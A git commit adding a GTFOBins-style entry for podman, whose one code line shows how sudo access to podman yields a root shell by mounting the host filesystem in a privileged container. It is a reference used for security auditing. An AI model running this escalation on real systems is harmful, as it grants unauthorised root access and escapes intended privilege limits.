Add podman

This commit is contained in:
locaIhost 2023-09-25 04:15:34 +02:00
parent 082b26c48f
commit 3eb98d5d33

6
_gtfobins/podman.md Normal file
View File

@ -0,0 +1,6 @@
---
functions:
sudo:
- description: The resulting is a root shell.
code: sudo podman run --rm -it --privileged --volume /:/mnt alpine chroot /mnt sh
---